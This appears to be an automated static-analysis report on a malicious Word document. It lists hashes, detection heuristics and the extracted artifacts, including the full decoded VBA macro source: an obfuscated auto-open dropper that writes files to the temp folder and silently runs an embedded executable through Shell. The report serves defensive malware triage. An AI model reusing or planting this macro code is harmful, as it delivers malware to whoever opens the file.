Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8460de1ab04bca45…

MALICIOUS

Office (OLE)

160.0 KB Created: 2016-02-11 08:57:00 Authoring application: Microsoft Office Word First seen: 2016-02-27
MD5: 37bfb90c5f3edf98334214e08d67415b SHA-1: 53d7b96793fbdb94717fbced7b7ffd5be2366542 SHA-256: 8460de1ab04bca45600642c72d23a71ba35e5504c6c07cfdb5c8da534dfcc621
634 Risk Score

Heuristics 17

  • ClamAV: BC.Win.Packer.Troll-14 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: BC.Win.Packer.Troll-14
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    weq = Shell(tytg, 0)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set vvGGVgwvF = CreateObject(LosPada(23 + 64) & "o" + "rd" + ".A" & "pplication")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set vvGGVgwvF = CreateObject(LosPada(23 + 64) & "o" + "rd" + ".A" & "pplication")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    DGSAHW = Environ(ROONWQ) + BGEVQWE
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1987 bytes
SHA-256: 280c1950cf233135c61ecc0d84e3ce5218e92927d9ff9faffbc9ef5abb20d50b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub HuebqSwq()
    YhbeGwql
End Sub
Sub YhbeGwql()
Dim fdaa As Integer
Dim QQNCC As String
TYQGUWD = DatePart("yyyy", "10/11/7181")
TYQGUWD = Left(TYQGUWD, 1)
ROONWQ = "EM"
fdaa = CInt(TYQGUWD) - 8
On Error Resume Next
BGEVQWE = Left("\2131\", 1)
ROONWQ = "T" & ROONWQ + "P"
DGSAHW = Environ(ROONWQ) + BGEVQWE
RTQCDW = Chr(46)
TYQW = RTQCDW + Chr(96 + 6 + fdaa)
TYQW = TYQW & "x" + Chr(90 + 11)
JNBBH = RTQCDW & LosPada(118 - 4) & LosPada(6 + 0 + 110) & "f"

TTTDADSS = DGSAHW + "jehjs" + JNBBH
RRTFDASD = DGSAHW + "kahjsd" + JNBBH
QQNCC = DGSAHW + "sak33" & TYQW & ""

ERdsa (TTTDADSS)
ERdsa (RRTFDASD)
Module1.Simana (2)
RFQGHVD = ";lk1klen abjksdhkashdjkas"
Set vvGGVgwvF = CreateObject(LosPada(23 + 64) & "o" + "rd" + ".A" & "pplication")
vvGGVgwvF.Visible = False
vvGGVgwvF.Documents.Open (TTTDADSS)
Module1.Simana (2)
HYUASGD = Module1.Felate(QQNCC)
Module1.Simana (2)
vvGGVgwvF.Quit
Set vvGGVgwvF = Nothing
End Sub
Public Function LosPada(ande As Integer)
    LosPada = Chr(ande)
End Function
Sub Workbook_Open()
    YhbeGwql
End Sub
Sub AutoOpen()
    NFYEUQ = "12ke;lk1;2 ek1;l2je 2l1kh ej12"
    HuebqSwq
End Sub
Public Function ERdsa(fjue As String)
    ActiveDocument.SaveAs FileName:=fjue, FileFormat:=wdFormatRTF
End Function
Sub Auto_Open()
    YhbeGwql
End Sub























Attribute VB_Name = "Module1"
Sub Simana(Sola As Long)
Dim Mone As Long
Dim Oijeq As Long
BFHJQ = "';lqwhdjk qwh dlkqdhkqwjqwgdhjqw dj"
Oijeq = Sola + Timer
Mone = Oijeq
Do While Timer < Mone
DoEvents
Loop
End Sub
Public Function Felate(tytg As String)
Dim weq As Variant
weq = Shell(tytg, 0)
End Function
embedded_office_00006252.exe embedded-pe Office MZ+PE at offset 0x6252 138670 bytes
SHA-256: 46ab663155bee99e15961c87c37d971a887ed2a4644ccc180f7c6dcb6aba7ce9
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1516721455/Ole10Native 115928 bytes
SHA-256: ed2826de31a3c28ecc1ec2f309a09d37ece7392d53c69f652cb3e066f53fdad1
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved artifact entropy is 7.54, consistent with packed or encrypted content.
ole10native_00_sak33.exe ole-package-payload OLE Ole10Native payload: ObjectPool/_1516721455/Ole10Native; display_name=; full_path=C:\Users\M\AppData\Local\Temp\sak33.exe; temp_path=; def_file= 115712 bytes
SHA-256: 21bb2fe8321ddc54e6e7505df503fdeecdaeeb77adda47c4e1229bfb0e6ff7e3
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved artifact entropy is 7.54, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.